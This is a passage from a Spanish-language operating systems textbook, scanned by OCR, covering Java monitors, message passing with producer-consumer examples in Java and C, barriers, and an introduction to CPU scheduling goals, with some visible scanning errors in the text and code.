lor desde 0 hasta (incluyendo a) N - 1. La variable inf es el índice de la ranura del búfer de donde 
se va a obtener el siguiente elemento. De manera similar, SUp es el índice de la ranura del búfer en 
donde se va a colocar el siguiente elemento. Se permite que inf = SUp, lo cual significa que hay 0 
o N elementos en el búfer. El valor de cuenta indica cuál caso se aplica. 

Los métodos sincronizados en Java difieren de los monitores clásicos en un punto esencial; Ja¬ 
va no tiene variables de condición integradas. En vez de ello, ofrece dos procedimientos (wait y no- 
tify) que son equivalentes a sieep y wakeup, con la excepción de que al utilizarlos dentro de métodos 
sincronizados no están sujetos a condiciones de carrera. En teoría, el método wait se puede inte¬ 
rrumpir, y esto es de lo que trata el código circundante. Java requiere que el manejo de excepcio¬ 
nes sea explícito. Para nuestros fines, sólo imagine que ir_al_estaclo_inactiVO es la manera de ir a 
dormir. 

Al automatizar la exclusión mutua de las regiones críticas, los monitores hacen que la progra¬ 
mación en paralelo sea mucho menos propensa a errores que con los semáforos. De todas formas 
tienen ciertas desventajas. No es por nada que nuestros dos ejemplos de monitores se escribieron 
en Pidgin Pascal en vez de usar C, como los demás ejemplos de este libro. Como dijimos antes, 
los monitores son un concepto de lenguaje de programación. El compilador debe reconocerlos y 
hacer los arreglos para la exclusión mutua de alguna manera. C, Pascal y la mayoría de los otros 
lenguajes no tienen monitores, por lo que es irrazonable esperar que sus compiladores implemen- 
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ten reglas de exclusión mutua. De hecho, ¿cómo podría el compilador saber siquiera cuáles proce¬ 
dimientos están en los monitores y cuáles no? 

Estos mismos lenguajes tampoco tienen semáforos, pero es fácil agregarlos; todo lo que nece¬ 
sitamos hacer es agregar dos rutinas cortas en lenguaje ensamblador a la biblioteca para emitir las 
llamadas al sistema up y down. Los compiladores ni siquiera tienen que saber que existen. Desde lue¬ 
go que los sistemas operativos tienen que saber acerca de los semáforos, pero si tenemos al menos 
un sistema operativo basado en semáforos, podemos escribir los programas de usuario para este sis¬ 
tema en C o C-H- (o incluso en lenguaje ensamblador, si somos demasiado masoquistas). Con los 
monitores se requiere un lenguaje que los tenga integrados. 

Otro problema con los monitores (y también con los semáforos) es que están diseñados para 
resolver el problema de exclusión mutua en una o más CPUs que tengan acceso a una memoria 
común. Al colocar los semáforos en la memoria compartida y protegerlos con instrucciones TSL o 
XCHG, podemos evitar las condiciones de carrera. Si utilizamos un sistema distribuido que consista 
en varias CPUs, cada una con su propia memoria privada, conectadas por una red de área local, 
estas primitivas no se pueden aplicar. La conclusión es que los semáforos son de un nivel dema¬ 
siado bajo y los monitores no pueden usarse, excepto en algunos lenguajes de programación. Ade¬ 
más, ninguna de las primitivas permite el intercambio de información entre las máquinas. Se 
necesita algo más. 


2.3.8 Pasaje (transmisión) de mensajes 

Ese “algo más” es el pasaje de mensajes (message passing). Este método de comunicación entre 
procesos utiliza dos primitivas (send y neceive) que, al igual que los semáforos y a diferencia de 
los monitores, son llamadas al sistema en vez de construcciones del lenguaje. Como tales, se pue¬ 
den colocar con facilidad en procedimientos de biblioteca, como 

send(destino, Smensaje); 

y 

receive(origen, Smensaje); 

La primera llamada envía un mensaje a un destino especificado y la segunda recibe un mensaje de 
un origen especificado (o de C U A L Q U IE RA, si al receptor no le importa). Si no hay un mensaje dis¬ 
ponible, el receptor se puede bloquear hasta que llegue uno. De manera alternativa, puede regresar 
de inmediato con un código de error. 

Aspectos de diseño para los sistemas con pasaje de mensajes 

Los sistemas de paso de mensajes tienen muchos problemas y cuestiones de diseño que presentan 
un reto y no surgen con los semáforos o monitores, en especial si los procesos que se están comu¬ 
nicando se encuentran en distintas máquinas conectadas por una red. Por ejemplo, se pueden 
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public class ProductorConsumidorí 

static final int N = 100; // constante que proporciona el tamaño del búfer 

static productor p = new productor(); // crea instancia de un nuevo hilo productor 
static consumidor c = new consumidor{); // crea instancia de un nuevo hilo consumidor 
static nuestro_monitor mon = new nuestro_monitor(); // crea instancia de un nuevo monitor 

public static void main(String args[]){ 

р. startO; // inicia el hilo productor 

с. start{); // inicia el hilo consumidor 

} 

static class productor extends Thread { 
public void run() {// el método run contiene el código del hilo 
int elemento; 

while(true){ // ciclo del productor 
elemento=producir_elemento(); 
mon.insertar(elemento); 

} 

} 

prívate int producir_elemento(){...} // realmente produce 

} 

static class consumidor extends Thread{ 
public void run() { // el método run contiene el código del hilo 
int elemento; 

while(true){ // ciclo del consumidor 
elemento=mon.eliminar(); 
consumir_elemento{elemento); 

} 

} 

prívate void consumir_elemento{int elemento)!...} // realmente consume 

} 

static class nuestro_monitor{ // este es un monitor 
prívate int bufer[]=new int[N]; 

prívate int cuéntalo, inf=0, sup=0; // contadores e índices 
public synchronized void insertar(int val){ 

if (cuenta==N) ir_a_estado_inactivo(); // si el búfer está lleno, pasa ai estado inactivo 

bufer[sup]=val; // inserta un elemento en el búfer 

sup=(sup+1)%N; // ranura en la que se va a colocar el siguiente elemento 

cuenta=cuenta+1; // ahora hay un elemento más en el búfer 

if (cuenta==1) notifyO; // si el consumidor estaba inactivo, lo despierta 

} 

public synchronized int eliminar(){ 
int val; 

if (cuenta==0) ir_a_estado_inactivo(); // si el búfer está vacío, pasa al estado inactivo 
val=bufer[inf]; // obtiene un elemento del búfer 

lo = (lo + 1) %N; // ranura en la que se va a colocar el siguiente elemento 
cuenta=cuenta-1; // un elemento menos en el búfer 
if (cuenta==N-1) notifyO; // si el productor estaba inactivo, lo despierta 
return val; 

} 

prívate void ir_a_estado_inactivo{) {try{wait();}catch(lnterruptedException exc){};} 

} 

} 

Figura 2-35. Una solución al problema del productor-consumidor en Java. 
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perder mensajes en la red. Para protegerse contra los mensajes perdidos, el emisor y el receptor pue¬ 
den acordar que, tan pronto como haya recibido un mensaje, el receptor enviará de vuelta un men¬ 
saje especial de acuse de recibo (acknowledgement). Si el emisor no ha recibido el acuse dentro 
de cierto intervalo de tiempo, vuelve a transmitir el mensaje. 

Ahora considere lo que ocurre si el mensaje se recibió en forma correcta, pero se pierde el men¬ 
saje de acuse que se envía de vuelta al emisor. Este volverá a transmitir el mensaje, por lo que el 
receptor lo recibirá dos veces. Es esencial que el receptor pueda diferenciar un mensaje nuevo de la 
retransmisión de uno anterior. Por lo general, este problema se resuelve colocando números de se¬ 
cuencia consecutivos en cada mensaje original. Si el receptor recibe un mensaje que contenga el 
mismo número de secuencia que el mensaje anterior, sabe que el mensaje es un duplicado que se 
puede ignorar. La comunicación exitosa a la cara del pasaje de mensajes sin confiabilidad constitu¬ 
ye una gran parte del estudio de las redes de computadoras. Para obtener más información, consul¬ 
te (Tanenbaum, 1996). 

Los sistemas de mensajes también tienen que lidiar con la forma en que se denominan los pro¬ 
cesos, de manera que el proceso especificado en una llamada a send o receive esté libre de ambi¬ 
güedad. La autenticación también es una cuestión en los sistemas de mensajes: ¿cómo puede saber 
el cliente que se está comunicando con el verdadero servidor de archivos y no con un impostor? 

Al otro extremo del espectro, también hay cuestiones de diseño importantes cuando el emisor y 
el receptor están en la misma máquina. Una de éstas es el rendimiento. La acción de copiar mensa¬ 
jes de un proceso a otro es siempre más lenta que realizar una operación con un semáforo o entrar a 
un monitor. Se ha realizado un gran esfuerzo para lograr que el pasaje de mensajes sea eficiente. Por 
ejemplo, Cheriton (1984) sugirió limitar el tamaño de los mensajes según el tamaño de los registros 
de la máquina y después realizar el pasaje de mensajes mediante el uso de los registros. 

El problema del productor-consumidor con pasaje de mensajes 

Ahora veamos cómo se puede resolver el problema del productor-consumidor con el pasaje de men¬ 
sajes y sin memoria compartida. En la figura 2-36 se muestra una solución. Suponemos que todos 
los mensajes tienen el mismo tamaño y el sistema operativo coloca los mensajes enviados, pero no 
recibidos, de manera automática en el búfer. En esta solución se utiliza un total de N mensajes, de 
manera similar a las N ranuras en un búfer de memoria compartida. El consumidor empieza por en¬ 
viar N mensajes vacíos al productor. Cada vez que el productor tiene un elemento para dar al con¬ 
sumidor, recibe un mensaje vacío y envía de regreso uno lleno. De esta manera, el número total de 
mensajes en el sistema permanece constante en el tiempo, para que se puedan almacenar en una can¬ 
tidad de memoria específica que se conoce de antemano. 

Si el productor trabaja con más rapidez que el consumidor, todos los mensajes terminarán lle¬ 
nos, esperando al consumidor; el productor se bloqueará, esperando a que regrese un mensaje va¬ 
cío. Si el consumidor trabaja con más rapidez, entonces ocurrirá lo inverso: todos los mensajes 
estarán vacíos, esperando a que el productor los llene; el consumidor se bloqueará en espera de un 
mensaje lleno. 

Hay muchas variantes posibles con el paso de mensajes. Para empezar, veamos la forma en que 
se direccionan los mensajes. Una manera es asignar a cada proceso una dirección única y direccio- 
nar los mensajes a los procesos. Una manera distinta es inventar una estructura de datos, conocida 
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#define N 100 

void productor{void) 

{ 

int elemento; 
mensaje m; 

while (TRUE) { 

elemento=producir_elemento(); 
receive(consumidor,&m); 
crear_mensaje{&m,elemento); 
send{consumidor,&m); 

} 

} 

vold consum¡dor(void) 

{ 

Int elemento, I; 
mensaje m; 

for (l=0; l<N; I++) send{productor,&m); 
while (TRUE){ 

recelve(productor,&m); 

elemento=extraer_elemento(&m); 

send{productor,&m); 

consumlr_elemento(elemento); 

} 

} 


/* número de ranuras en el búfer */ 


/* búfer de mensajes */ 


/* genera algo para colocar en el búfer */ 

/* espera a que llegue un mensaje vacío */ 
/* construye un mensaje para enviarlo 7 
/* envía elemento al consumidor 7 


/* envía N mensajes vacíos 7 

/* obtiene el mensaje que contiene el elemento 7 
/* extrae el elemento del mensaje 7 
/* envía de vuelta respuesta con mensaje vacío 7 
/* hace algo con el elemento 7 


Figura 2-36. El problema del productor-consumidor con N mensajes. 


como buzón. Un buzón es un lugar para colocar en el búfer cierto número de mensajes, que por lo 
general se especifica a la hora de crear el buzón. Cuando se utilizan buzones, los parámetros de di¬ 
rección en las llamadas a send y receive son buzones, no procesos. Cuando un proceso trata de en¬ 
viar un buzón que está lleno, se suspende hasta que se remueva un mensaje de ese buzón, haciendo 
espacio para un nuevo mensaje. 

Para el problema del productor-consumidor, tanto el productor como el consumidor crearían 
buzones con el tamaño suficiente como para contener N mensajes. El productor enviaría mensajes 
que contuvieran los datos actuales al buzón del consumidor y el consumidor enviaría mensajes va¬ 
cíos al buzón del productor. Cuando se utilizan buzones, el mecanismo de búfer está claro; el bu¬ 
zón de destino contiene los mensajes que se han enviado al proceso de destino, pero que todavía no 
se han aceptado. 

El otro extremo de tener buzones es para eliminar todo el uso de búfer. Cuando se sigue este mé¬ 
todo, si la operación send termina antes de la operación receive, el proceso emisor se bloquea has¬ 
ta que ocurre la operación receive, momento en el cual el mensaje se puede copiar de manera direc¬ 
ta del emisor al receptor, sin búfer de por medio. De manera similar, si se realiza primero la opera- 


144 


PROCESOS E HILOS 


CAPÍTULO 2 


ción receive, el receptor se bloquea hasta que ocurre una operación send. A menudo esta estrategia 
se conoce como encuentro. Es más fácil imple mentar que un esquema de mensajes con búfer, pero 
menos flexible debido a que el emisor y el receptor se ven obligados a ejecutarse en paso de bloqueo. 

El pasaje de mensajes se utiliza con frecuencia en los sistemas de programación en paralelo. 
Por ejemplo, un sistema de paso de mensajes reconocido es M Pl (M essage-Passing I nterface; In¬ 
terfaz de pasaje de mensajes). Se utiliza mucho en la computación científica. Para obtener más 
información sobre este sistema, consulte (Gropp y colaboradores, 1994; Snir y colaboradores, 
1996). 

2.3.9 Barreras 

Nuestro último mecanismo de sincronización está destinado a los grupos de procesos, en vez de las 
situaciones de tipo productor-consumidor de dos procesos. Algunas aplicaciones se dividen en fa¬ 
ses y tienen la regla de que ningún proceso puede continuar a la siguiente fase sino hasta que todos 
los procesos estén listos para hacerlo. Para lograr este comportamiento, se coloca una barrera al fi¬ 
nal de cada fase. Cuando un proceso llega a la barrera, se bloquea hasta que todos los procesos han 
llegado a ella. La operación de una barrera se ilustra en la figura 2-37. 
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Figura 2-37. Uso de una barrera, (a) Procesos acercándose a una barrera, (b) Todos los 
procesos, excepto uno, bloqueados en la barrera, (c) Cuando el último proceso llega a 
la barrera, todos se dejan pasar. 


En la figura 2-37(a) podemos ver cuatro procesos que se acercan a una barrera. Lo que esto sig¬ 
nifica es que sólo están calculando y no han llegado al final de la fase actual todavía. Después de 
cierto tiempo, el primer proceso termina todos los cálculos requeridos durante la primera fase. Des¬ 
pués ejecuta la primitiva banrier, por lo general llamando a un procedimiento de biblioteca. Después 
el proceso se suspende. Un poco después, un segundo y luego un tercer proceso, terminan la primera 
fase, ejecutando también la primitiva barrier. Esta situación se ilustra en la figura 2-37(b). Por últi¬ 
mo, cuando el último proceso (C) llega a la barrera se liberan todos los procesos, como se muestra 
en la figura 2-37(c). 
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Como ejemplo de un problema que requiere barreras, considere un problema común de relaja¬ 
ción en física o ingeniería. Por lo general hay una matriz que contiene ciertos valores iniciales. Los 
valores podrían representar temperaturas en diversos puntos de una hoja de metal. La idea podría 
ser calcular cuánto tarda en propagarse el efecto de una flama colocada en una esquina a lo largo 
de la hoja. 

Empezando con los valores actuales, se aplica una transformación a la matriz para obtener la 
segunda versión de ésta; por ejemplo, mediante la aplicación de las leyes de termodinámica para 
ver cuál es el valor de todas las temperaturas en un tiempo posterior, representado por AT. Después 
el proceso se repite una y otra vez, proporcionando las temperaturas en los puntos de muestreo co¬ 
mo una función del tiempo, a medida que se calienta la hoja. El algoritmo produce una serie de ma¬ 
trices a través del tiempo. 

Ahora imagine que la matriz es muy grande (por ejemplo, de 1 millón por 1 millón), por lo cual 
se requieren procesos en paralelo (posiblemente en un multiprocesador) para agilizar los cálculos. 
Distintos procesos trabajarán en distintas partes de la matriz, calculando los nuevos elementos de 
ésta a partir de los anteriores, de acuerdo con las leyes de la física. Sin embargo, ningún proceso 
puede empezar en la iteración n H- 1 sino hasta que se complete la iteración n, es decir, hasta que to¬ 
dos los proceso hayan terminado su trabajo actual. La forma de lograr este objetivo es programar 
cada proceso para que ejecute una operación barrier después de que haya terminado su parte de 
la iteración actual. Cuando todos ellos hayan terminado, la nueva matriz (la entrada para la siguien¬ 
te iteración) estará completa y todos los procesos se liberarán en forma simultánea para empezar la 
siguiente iteración. 


2.4 PLANIFICACIÓN 

Cuando una computadora se multiprograma, con frecuencia tiene varios procesos o hilos que com¬ 
piten por la CPU al mismo tiempo. Esta situación ocurre cada vez que dos o más de estos procesos 
se encuentran al mismo tiempo en el estado listo. Si sólo hay una CPU disponible, hay que decidir 
cuál proceso se va a ejecutar a continuación. La parte del sistema operativo que realiza esa decisión 
se conoce como planificador de procesos y el algoritmo que utiliza se conoce como algoritmo de 
planificación. Estos términos conforman el tema a tratar en las siguientes secciones. 

Muchas de las mismas cuestiones que se aplican a la planificación de procesos también se apli¬ 
can a la planificación de hilos, aunque algunas son distintas. Cuando el kernel administra hilos, por 
lo general la planificación se lleva a cabo por hilo, e importa muy poco (o nada) a cuál proceso per¬ 
tenece ese hilo. Al principio nos enfocaremos en las cuestiones de planificación que se aplican a los 
procesos e hilos. Más adelante analizaremos de manera explícita la planificación de hilos y algunas 
de las cuestiones únicas que surgen. En el capítulo 8 trabajaremos con los chips multinúcleo. 

2.4.1 Introducción a la planificación 

En los días de los sistemas de procesamiento por lotes, con entrada en forma de imágenes de tarje¬ 
tas en una cinta magnética, el algoritmo de planificación era simple: bastaba con ejecutar el siguien¬ 
te trabajo en la cinta. Con los sistemas de multiprogramación, el algoritmo de planificación se 


146 


PROCESOS E HILOS 


CAPÍTULO 2 


volvió más complejo debido a que comúnmente había varios usuarios esperando ser atendidos. Al¬ 
gunas mainframe todavía combinan los servicios de procesamiento por lotes y de tiempo compar¬ 
tido, requiriendo que el planificador decida si le toca el turno a un trabajo de procesamiento por 
lotes o a un usuario interactivo en una terminal. (Como punto y aparte, un trabajo de procesamien¬ 
to por lotes puede ser una petición para ejecutar varios programas en sucesión, pero para esta sec¬ 
ción sólo supondremos que es una petición para ejecutar un solo programa). Debido a que el tiempo 
de la CPU es un recurso escaso en estas máquinas, un buen planificador puede hacer una gran di¬ 
ferencia en el rendimiento percibido y la satisfacción del usuario. En consecuencia, se ha puesto 
gran esfuerzo en idear algoritmos de planificación astutos y eficientes. 

Con la llegada de las computadoras personales, la situación cambió de dos maneras. En primer 
lugar, la mayor parte del tiempo sólo hay un proceso activo. Es muy poco probable que un usuario 
que entra a un documento en un procesador de palabras compile al mismo tiempo un programa en 
segundo plano. Cuando el usuario escribe un comando para el procesador de palabras, el planifica¬ 
dor no tiene que esforzarse mucho en averiguar qué proceso ejecutar; el procesador de palabras es 
el único candidato. 

En segundo lugar, las computadoras se han vuelto tan veloces con el paso de los años que la 
CPU es raras veces un recurso escaso. La mayoría de los programas para computadoras personales 
están limitados en cuanto a la velocidad a la que el usuario puede presentar los datos de entrada (al es¬ 
cribir o hacer clic), no por la velocidad con que la CPU puede procesarlos. Incluso las compilacio¬ 
nes, que en el pasado consumían muchos ciclos de la CPU, requieren unos cuantos segundos en la 
mayoría de los casos hoy en día. Aún y cuando se estén ejecutando dos programas al mismo tiem¬ 
po, como un procesador de palabras y una hoja de cálculo, raras veces es importante saber quién se 
ejecuta primero, ya que el usuario probablemente está esperando a que ambos terminen. Como con¬ 
secuencia, la planificación no es de mucha importancia en las PCs simples. Desde luego que hay 
aplicaciones que prácticamente se comen viva a la CPU; por ejemplo, para visualizar una hora de 
video en alta resolución, a la vez que se ajustan los colores en cada uno de los 108,000 cuadros (en 
NTSC) o 90,000 cuadros (en PAL) se requiere de un poder de cómputo a nivel industrial. Sin em¬ 
bargo, las aplicaciones similares son la excepción, en vez de la regla. 

Al tratarse de servidores en red, la situación cambia en forma considerable. Aquí varios proce¬ 
sos compiten a menudo por la CPU, por lo que la planificación retoma importancia. Por ejemplo, 
cuando la CPU tiene que elegir entre ejecutar un proceso que recopila las estadísticas diarias y uno 
que atiende las peticiones de los usuarios, habrá usuarios más contentos si el segundo tipo de pro¬ 
cesos tiene prioridad sobre la CPU. 

Además de elegir el proceso correcto que se va a ejecutar a continuación, el planificador tam¬ 
bién tiene que preocuparse por hacer un uso eficiente de la CPU, debido a que la conmutación de 
procesos es cara. Para empezar, debe haber un cambio del modo de usuario al modo kernel. Después 
se debe guardar el estado del proceso actual, incluyendo el almacenamiento de sus registros en la ta¬ 
bla de procesos para que puedan volver a cargarse más adelante. En muchos sistemas, el mapa de 
memoria (por ejemplo, los bits de referencia de memoria en la tabla de páginas) se debe guardar tam¬ 
bién. Luego hay que seleccionar un nuevo proceso mediante la ejecución del algoritmo de planifica¬ 
ción. Después de eso, se debe volver a cargar en la MMU el mapa de memoria del nuevo proceso. 
Por último, se debe iniciar el nuevo proceso. Además de todo esto, generalmente la conmutación de 
procesos hace inválida toda la memoria caché, por lo que tiene que volver a cargarse en forma diná- 
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mica desde la memoria principal dos veces (al momento de entrar al kernel y al salir de éste). Con 
todo, si se realizan muchas conmutaciones de procesos por segundo, se puede llegar a consumir una 
cantidad considerable de tiempo de la CPU, por lo cual se aconseja tener precaución. 

Comportamiento de un proceso 

Casi todos los procesos alternan ráfagas de cálculos con peticiones de E/S (de disco), como se mues¬ 
tra en la figura 2.38. Por lo general la CPU opera durante cierto tiempo sin detenerse, después se rea¬ 
liza una llamada al sistema para leer datos de un archivo o escribirlos en el mismo. Cuando se 
completa la llamada al sistema, la CPU realiza cálculos de nuevo hasta que necesita más datos o tie¬ 
ne que escribir más datos y así sucesivamente. Hay que tener en cuenta que algunas actividades de 
E/S cuentan como cálculos. Por ejemplo, cuando la CPU copia bits a una RAM de video para ac¬ 
tualizar la pantalla, está calculando y no realizando operaciones de E/S, ya que la CPU está en uso. 
En este sentido, la E/S es cuando un proceso entra al estado bloqueado en espera de que un dispo¬ 
sitivo externo complete su trabajo. 



Tiempo 


Figura 2-38. Las ráfagas de uso de la CPU se alternan con los periodos de espera por 
la E/S. (a) Un proceso ligado a la CPU. (b) Un proceso ligado a la E/S. 


Lo importante a observar acerca de la figura 2-38 es que algunos procesos, como el que se 
muestra en la figura 2-38(a), invierten la mayor parte de su tiempo realizando cálculos, mientras 
que otros, como el que se muestra en la figura 2-38(b), invierten la mayor parte de su tiempo espe¬ 
rando la E/S. A los primeros se les conoce como limitados a cálculos; a los segundos como limi¬ 
tados a E/S (l/O-bound). Por lo general, los procesos limitados a cálculos tienen ráfagas de CPU 
largas y en consecuencia, esperas infrecuentes por la E/S, mientras que los procesos limitados a E/S 
tienen ráfagas de CPU cortas y por ende, esperas frecuentes por la E/S. Observe que el factor cla¬ 
ve es la longitud de la ráfaga de CPU, no de la ráfaga de E/S. Los procesos limitados a E/S están 
limitados a la E/S debido a que no realizan muchos cálculos entre una petición de E/S y otra, no de¬ 
bido a que tengan peticiones de E/S en especial largas. Se requiere el mismo tiempo para emitir la 
petición de hardware para leer un bloque de disco, sin importar qué tanto (o qué tan poco) tiempo 
se requiera para procesar los datos, una vez que lleguen. 
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Vale la pena observar que, a medida que las CPUs se vuelven más rápidas, los procesos tienden 
a ser más limitados a E/S. Este efecto ocurre debido a que las CPUs están mejorando con mucha ma¬ 
yor rapidez que los discos. Como consecuencia, es probable que la planificación de procesos limita¬ 
dos a E/S se convierta en un tema más importante en un futuro. La idea básica aquí es que, si un 
proceso limitado a E/S desea ejecutarse, debe obtener rápidamente la oportunidad de hacerlo para 
que pueda emitir su petición de disco y mantener el disco ocupado. Como vimos en la figura 2-6, 
cuando los procesos están limitados a E/S, se requieren muchos de ellos para que la CPU pueda es¬ 
tar completamente ocupada. 

Cuándo planificar procesos 

Una cuestión clave relacionada con la planificación es saber cuándo tomar decisiones de planifica¬ 
ción. Resulta ser que hay una variedad de situaciones en las que se necesita la planificación. En pri¬ 
mer lugar, cuando se crea un nuevo proceso se debe tomar una decisión en cuanto a si se debe 
ejecutar el proceso padre o el proceso hijo. Como ambos procesos se encuentran en el estado listo, 
es una decisión normal de programación y puede ejecutar cualquiera; es decir, el programador de 
procesos puede elegir ejecutar de manera legítima, ya sea el padre o el hijo. 

En segundo lugar, se debe tomar una decisión de planificación cuando un proceso termina. Ese 
proceso ya no se puede ejecutar (debido a que ya no existe), por lo que se debe elegir algún otro pro¬ 
ceso del conjunto de procesos listos. Si no hay un proceso listo, por lo general se ejecuta un proce¬ 
so inactivo suministrado por el sistema. 

En tercer lugar, cuando un proceso se bloquea por esperar una operación de E/S, un semáforo 
o por alguna otra razón, hay que elegir otro proceso para ejecutarlo. Algunas veces la razón del blo¬ 
queo puede jugar un papel en la elección. Por ejemplo, si A es un proceso importante y está espe¬ 
rando a que B salga de su región crítica, si dejamos que B se ejecute a continuación podrá salir de 
su región crítica y por ende, dejar que A continúe. Sin embargo, el problema es que el planificador 
comúnmente no tiene la información necesaria para tomar en cuenta esta dependencia. 

En cuarto lugar, cuando ocurre una interrupción de E/S tal vez haya que tomar una decisión de 
planificación. Si la interrupción proviene de un dispositivo de E/S que ha terminado su trabajo, tal 
vez ahora un proceso que haya estado bloqueado en espera de esa operación de E/S esté listo para 
ejecutarse. Es responsabilidad del planificador decidir si debe ejecutar el proceso que acaba de en¬ 
trar al estado listo, el proceso que se estaba ejecutando al momento de la interrupción, o algún otro. 

Si un reloj de hardware proporciona interrupciones periódicas a 50 o 60 Hz o cualquier otra fre¬ 
cuencia, se puede tomar una decisión de planificación en cada interrupción de reloj o en cada k-ési- 
ma interrupción de reloj. Los algoritmos de planificación se pueden dividir en dos categorías con 
respecto a la forma en que manejan las interrupciones del reloj. Un algoritmo de programación no 
apropiativo (nonpreemptive) selecciona un proceso para ejecutarlo y después sólo deja que se eje¬ 
cute hasta que el mismo se bloquea (ya sea en espera de una operación de E/S o de algún otro pro¬ 
ceso) o hasta que libera la CPU en forma voluntaria. Incluso aunque se ejecute durante horas, no se 
suspenderá de manera forzosa. En efecto, no se toman decisiones de planificación durante las inte¬ 
rrupciones de reloj. Una vez que se haya completado el procesamiento de la interrupción de reloj, 
se reanuda la ejecución del proceso que estaba antes de la interrupción, a menos que un proceso de 
mayor prioridad esté esperando por un tiempo libre que se acabe de cumplir. 
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Por el contrario, un algoritmo de planificación apropiativa selecciona un proceso y deja que 
se ejecute por un máximo de tiempo fijo. Si sigue en ejecución al final del intervalo de tiempo, se 
suspende y el planificador selecciona otro proceso para ejecutarlo (si hay uno disponible). Para lle¬ 
var a cabo la planificación apropiativa, es necesario que ocurra una interrupción de reloj al final del 
intervalo de tiempo para que la CPU regrese el control al planificador. Si no hay un reloj disponi¬ 
ble, la planificación no apropiativa es la única opción. 


C alegorías de los algoritmos de planificación 

No es sorprendente que distintos entornos requieran algoritmos de planificación diferentes. Esta si¬ 
tuación se presenta debido a que las diferentes áreas de aplicación (y los distintos tipos de sistemas 
operativos) tienen diferentes objetivos. En otras palabras, lo que el planificador debe optimizar no es 
lo mismo en todos los sistemas. Tres de los entornos que vale la pena mencionar son: 

1. Procesamiento por lotes. 

2. Interactivo. 

3. De tiempo real. 

Los sistemas de procesamiento por lotes siguen utilizándose ampliamente en el mundo de los ne¬ 
gocios para realizar nóminas, inventarios, cuentas por cobrar, cuentas por pagar, cálculos de interés 
(en los bancos), procesamiento de reclamaciones (en las compañías de seguros) y otras tareas pe¬ 
riódicas. En los sistemas de procesamiento por lotes no hay usuarios que esperen impacientemente 
en sus terminales para obtener una respuesta rápida a una petición corta. En consecuencia, son acep¬ 
tables los algoritmos no apropiativos (o apropiativos con largos periodos para cada proceso). Este 
método reduce la conmutación de procesos y por ende, mejora el rendimiento. En realidad, los al¬ 
goritmos de procesamiento por lotes son bastante generales y a menudo se pueden aplicar a otras 
situaciones también, lo cual hace que valga la pena estudiarlos, incluso para las personas que no es¬ 
tán involucradas en la computación con mainframes corporativas. 

En un entorno con usuarios interactivos, la apropiación es esencial para evitar que un proceso 
acapare la CPU y niegue el servicio a los demás. Aun si no hubiera un proceso que se ejecutara in¬ 
definidamente de manera intencional, podría haber un proceso que deshabilitara a los demás de ma¬ 
nera indefinida, debido a un error en el programa. La apropiación es necesaria para evitar este 
comportamiento. Los servidores también entran en esta categoría, ya que por lo general dan servi¬ 
cio a varios usuarios (remotos), todos los cuales siempre tienen mucha prisa. 

En los sistemas con restricciones de tiempo real, aunque parezca extraño, la apropiación a ve¬ 
ces es no necesaria debido a que los procesos saben que no se pueden ejecutar durante periodos ex¬ 
tensos, que por lo general realizan su trabajo y se bloquean con rapidez. La diferencia con los 
sistemas interactivos es que los sistemas de tiempo real sólo ejecutan programas destinados para 
ampliar la aplicación en cuestión. Los sistemas interactivos son de propósito general y pueden eje¬ 
cutar programas arbitrarios que no sean cooperativos, o incluso malintencionados. 
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M etas de los algoritmos de planificación 

Para poder diseñar un algoritmo de programación, es necesario tener cierta idea de lo que debe ha¬ 
cer un buen algoritmo. Algunos objetivos dependen del entorno (procesamiento por lotes, interac¬ 
tivo o de tiempo real), pero hay también algunos otros que son deseables en todos los casos. En la 
figura 2-39 se listan algunas metas. A continuación los analizaremos, uno a la vez. 


Todos los sistemas 

Equidad - Otorgar a cada proceso una parte justa de la CPU 

Aplicación de políticas - Verificar que se lleven a cabo las políticas establecidas 

Balance - Mantener ocupadas todas las partes del sistema 

Sistemas de procesamiento por lotes 

Rendimiento - Maximizar el número de trabajos por hora 

Tiempo de retorno - Minimizar el tiempo entre la entrega y la terminación 

Utilización de la CPU - Mantener ocupada la CPU todo el tiempo 

Sistemas interactivos 

Tiempo de respuesta - Responder a las peticiones con rapidez 
Proporcionalidad - Cumplir las expectativas de los usuarios 

Sistemas de tiempo real 

Cumplir con los plazos - Evitar perder datos 

Predictibilidad - Evitar la degradación de la calidad en los sistemas multimedia 
Figura 2-39. Algunas metas del algoritmo de planificación bajo distintas circunstancias. 


Bajo todas las circunstancias, la equidad es importante. Los procesos comparables deben obte¬ 
ner un servicio comparable. No es justo otorgar a un proceso mucho más tiempo de la CPU que a 
uno equivalente. Desde luego que las distintas categorías de procesos se pueden tratar de manera 
diferente. Considere el control de la seguridad y la administración de nómina en un centro compu- 
tacional de un reactor nuclear. 

La ejecución de las políticas del sistema está relacionada con la equidad. Si la política local es 
que los procesos de control de seguridad se ejecuten cada vez que lo deseen, aun si esto significa que 
la nómina se tardará 30 segundos más, el planificador tiene que asegurar que se ejecute esta política. 

Otra meta general es mantener ocupadas todas las partes del sistema siempre que sea posible. 
Si la CPU y todos los dispositivos de E/S se pueden mantener en ejecución todo el tiempo, se rea¬ 
lizará una mayor cantidad de trabajo por segundo que cuando algunos de los componentes están 
inactivos. Por ejemplo, en un sistema de procesamiento por lotes, el planificador controla cuáles tra¬ 
bajos se llevan a memoria para ejecutarlos. Es mejor tener algunos procesos limitados a CPU y al¬ 
gunos procesos limitados a E/S juntos en la memoria, que primero cargar y ejecutar todos los 
trabajos limitados a CPU y después, cuando terminen, cargar y ejecutar todos los trabajos limitados 
a E/S. Si se utiliza esta última estrategia, cuando los procesos ligados a CPU se ejecuten, lucharán 
por la CPU y el disco estará inactivo. Más adelante, cuando entren los trabajos ligados a E/S, lu- 
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charán por el disco y la CPU estará inactiva. Es mejor mantener todo el sistema en ejecución al mis¬ 
mo tiempo mediante una cuidadosa mezcla de procesos. 

Los administradores de los centros grandes de cómputo que ejecutan muchos trabajos de proce¬ 
samiento por lotes comúnmente se basan en tres métricas para verificar el desempeño de sus siste¬ 
mas: rendimiento, tiempo de retomo y utilización de la CPU. El rendimiento es el número de 
trabajos por hora que completa el sistema. Considerando todos los detalles, es mejor terminar 50 tra¬ 
bajos por hora que terminar 40. El tiempo de retorno es el tiempo estadísticamente promedio des¬ 
de el momento en que se envía un trabajo por lotes, hasta el momento en que se completa. Este 
parámetro mide cuánto tiempo tiene que esperar el usuario promedio la salida. He aquí la regla: lo 
pequeño es bello. 

Un algoritmo de planificación que maximiza el rendimiento no necesariamente minimiza el 
tiempo de retomo. Por ejemplo, dada una mezcla de trabajos cortos y largos, un planificador que 
siempre ha ejecutado trabajos cortos y nunca ejecutó trabajos largos podría lograr un rendimiento 
